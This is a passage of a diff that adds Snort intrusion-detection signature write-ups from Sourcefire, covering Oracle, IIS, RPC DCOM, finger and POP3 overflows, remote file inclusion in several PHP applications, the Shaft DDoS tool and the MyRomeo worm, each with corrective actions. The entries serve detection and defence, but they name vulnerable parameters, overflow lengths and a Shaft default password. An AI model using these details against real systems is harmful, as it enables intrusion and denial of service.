+vulnerability in the procedure drop_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1200.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1200
+
+--
+Summary:
+This event is generated when an invalid URL response is sent from a
+webserver to a client.
+
+--
+Impact:
+Information gathering and possible Denial of Service (DoS).
+
+--
+Detailed Information:
+This event is generated when an invalid URL response is sent from a
+webserver to a client. It is possible under some circumstances, to cause
+a DoS condition by supplying an invalid URL to a web server running an
+affected version of Microsoft IIS 4.0. Certain invalid URLs can cause
+the system to make an invalid memory request that will in turn stop the
+IIS service from running.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0 on NT systems
+	
+--
+Attack Scenarios:
+The attacker would merely need to make a web request using an invalid
+URL.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the system to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1803.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1803
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/239.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+239
+
+--
+Summary:
+This event is generated when a DDoS Shaft handler communicates with a Shaft agent.  It is also possible that this event may be generated when any host attempts to discover a Shaft agent.   
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft handler or a host attempting to discover Shaft agents.  If the listed destination IP is in your network, it may be a Shaft agent.
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Handlers communicate with agents to direct them to launch attacks. A handler may communicate with an agent using a UDP packet to destination port 18753 with a content of "alive tijgu.  This communication checks if an agent is alive and uses a default password of "tijgu".
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft handler needs to discover if an agent is alive before directing it to launch an attack.
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS255
+
+Miscellaneous:
+http://biocserver.cwru.edu/~jose/shaft_analysis/
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2999.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2999
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1627.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1627
+
+--
+Summary:
+This event is generated when packets on the network are using an 
+unassigned or reserved IP protocol.
+
+--
+Impact:
+Possible prelude to system compromise.
+
+--
+Detailed Information:
+Under normal circumstances IP packets do not use unassigned or reserved 
+protocols.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	All
+
+--
+Attack Scenarios:
+The attacker may send specially crafted packets using an unassigned or 
+reserved protocol.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Research or testing of new protocols may trigger this event.
+
+Novell use protocol 224 for the Cluster heart beat
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Use a packet filtering device to reject packets using an unknown 
+protocol.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+IANA
+http://www.iana.org/assignments/protocol-numbers
+
+--
--- /dev/null
+++ b/doc/signatures/1718.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1718
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000468.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000468
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "WebprojectDB" application running on a webserver. 
+Access to the file "lang.php" using a remote file being passed as the "INCDIR" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "INCDIR" parameter in the "lang.php" script used by the 
+"WebprojectDB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WebprojectDB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/724.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+724
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/1046.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1046
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2409.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+2409
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer by
+supplying a very long username to an APOP POP3 service.
+
+--
+Impact:
+Serious. Several POP3 servers are vulnerable to USER buffer overflows.
+
+--
+Detailed Information:
+By supplying more than 626 bytes of data to the APOP USER command on 1st
+Class Internet Solutions' 1st Class Mail Server, an attacker may
+overflow a buffer resulting in the opportunity to execute code of their
+choosing on the targeted machine with the privileges of the user running
+the service.
+
+Other Mail software may be prone to this attack.
+
+--
+Affected Systems:
+	1st Class Mail Server
+
+--
+Attack Scenarios:
+An attacker may connect to the service and supply an over-long username
+to overflow the buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check for other events generated by the source IP address.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2689.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2689
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure disable_receiver_trace
+. This procedure is included in
+sys.dbms_internal_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000742.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000742
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "functions.inc" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "functions.inc" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3080.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+3080
+
+--
+Summary:
+This event is generated when a remote attacker sends an overly long "secure"
+query to a host acting as an Unreal engine server.  This may
+indicate an attempt to exploit a buffer overflow vulnerability.
+
+--
+Impact:
+Serious. A successful buffer overflow can permit the execution of arbitrary
+code on a vulnerable system.
+
+--
+Detailed Information:
+Unreal Tournament 2003 and 2004 are popular games developed by EpicGames and
+available for Linux, Windows and Macintosh platforms. The Unreal engine is
+used for both client and server functionality. An overly long "secure"
+query can be sent to the game server, causing a buffer overflow and the
+subsequent execution of arbitrary code.
+
+--
+Affected Systems:
+	Multiple versions of the Unreal Engine running on Linux, Microsoft
+	Windows and Macintosh platforms.
+
+--
+Attack Scenarios:
+An attacker can send an overly long "secure" query to a vulnerable host, causing
+a buffer overflow and the subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+Unreal servers can be configured to run on arbitrary ports.
+Administrators should either change the port used in the rule or create
+a variable for the ports to be used in the rule.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current nonaffected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+OSVDB
+http://www.osvdb.org/displayvuln.php?osvdb_id=7217&Lookup=Lookup
+
+--
--- /dev/null
+++ b/doc/signatures/3286.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3286
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2458.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2458
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running has joined a chat room or is examining chat rooms to join.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Yahoo IM provides a means of allowing users who share similar interests to join a chat room and exchange messages.  While there are no known exploits associated with exchanging messages, this type of activity may not be appropriate in certain network environments.  
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attacks.
+
+--
+Ease of Attack:
+No known attacks.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1590.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1590
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1920.txt
@@ -0,0 +1,57 @@
+Nigel:  Old reference pointed to something totally unrelated.
+Rule:
+--
+
+Sid:
+1920
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability associated with the FTP SITE NEWER command that may cause a denial of service or allow the upload of executable files.
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a denial of service or allow the upload of executable files on the vulnerable FTP server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability associated with the WU-FTP server version of the SITE NEWER command. It is possible to cause a denial of service attack that consumes memory or upload files to execute arbitrary commands with the privileges of the process running the FTP server. 
+
+--
+Affected Systems:
+Hosts running WU-FTPD 2.5.0.  
+
+--
+Attack Scenarios:
+An attacker can cause a denial of service or upload files to execute arbitrary commands on the vulnerable FTP server.
+
+--
+Ease of Attack:
+Difficult.  No known exploits available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/737
+
+--
--- /dev/null
+++ b/doc/signatures/3156.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3156
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/696.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+696
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/326.txt
@@ -0,0 +1,72 @@
+Rule: 
+
+--
+Sid: 326
+
+-- 
+
+Summary: 
+This event is generated when a remote command execution exploit against
+a finger daemon is attempted.
+
+-- 
+Impact: 
+Serious. The attacker may be presented with the opportunity to run a
+command of his choice on the target UNIX system
+
+--
+Detailed Information:
+This event is generated when a specific attack against a vulnerable
+version of finger daemon is detected. 
+
+The Finger daemon is used to provide information about users on a UNIX
+system. It used to be installed and enabled by default on most
+UNIX/Linux systems. The attack may allow an attacker to execute a
+command remotely on a target system with the privileges of the user
+running the "finger" daemon. The user is usually defined in the
+/etc/inetd.conf file and is commonly designated as "nobody".
+
+--
+Attack Scenarios:  
+An attacker may try the attack and then executes a command to download a
+backdoor to the target system. He then connects to the system and may
+attempt to escalate his privileges by exploiting a local SUID
+application to gain "root" privileges.
+
+-- 
+Ease of Attack: 
+Simple, no exploit software is required, just a specially formatted finger query
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the
+service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS379
+
+Bugtraq:
+http://online.securityfocus.com/bid/974
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0150
+
+--
--- /dev/null
+++ b/doc/signatures/100000355.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000355
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "eSyndiCat" application running on a webserver. Access to the file "cron.php" using a remote file being passed as the "path_to_config" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path_to_config" parameter in the "cron.php" script used by the "eSyndiCat" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using eSyndiCat
+
+--
+Attack Scenarios:
